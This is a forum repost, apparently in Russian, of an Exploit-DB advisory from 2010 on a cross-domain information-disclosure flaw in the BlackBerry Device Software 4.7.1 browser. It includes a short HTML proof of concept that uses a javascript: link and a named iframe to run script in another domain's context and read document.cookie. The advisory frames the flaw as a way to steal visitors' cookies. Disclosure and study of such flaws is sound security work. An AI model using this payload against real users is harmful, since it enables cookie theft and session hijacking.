Exploit Research In Motion BlackBerry Device Software 4.7.1 - Cross Domain Information Disclosure

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
34802
Проверка EDB
  1. Пройдено
Автор
599EME MAN
Тип уязвимости
REMOTE
Платформа
HARDWARE
CVE
N/A
Дата публикации
2010-10-04
Research In Motion BlackBerry Device Software 4.7.1 - Cross Domain Information Disclosure
HTML:
source: https://www.securityfocus.com/bid/43685/info

Research In Motion BlackBerry Device Software is prone to a cross-domain information-disclosure vulnerability because the application's web browser fails to properly enforce the same-origin policy.

An attacker can exploit this issue to access local files or content from a browser window in another domain or security zone. This may allow the attacker to obtain sensitive information or may aid in further attacks. 

# [+] BlackBerry Browser Cross Origin Bypass
#
# [+] Author : 599eme Man
# [+] Contact : [email protected]
#
#[------------------------------------------------------------------------------------]
#
# [+] How use ?
#
# The Cross Origin Bypass is a way to bypass the domain's restrictions, you can execute javascript throught your domain on other domain, so you can get visitor's cookie throught your website.
#
# [+] PoC :
#
# Create a file.htm, save it with this code below and upload it on your server.
#
# <!--
# BlackBerry Cross Origin Bypass<br>
# Found by 599eme Man<br>
# [email protected]<br>
# Test On google<br>
# -->
# <a href="javascript:window.open('javascript:alert(document.cookie)','blackb');">Test me</a><br>
# <iframe name="blackb" src="http://www.example.com"> </iframe>
 
Источник
www.exploit-db.com

Похожие темы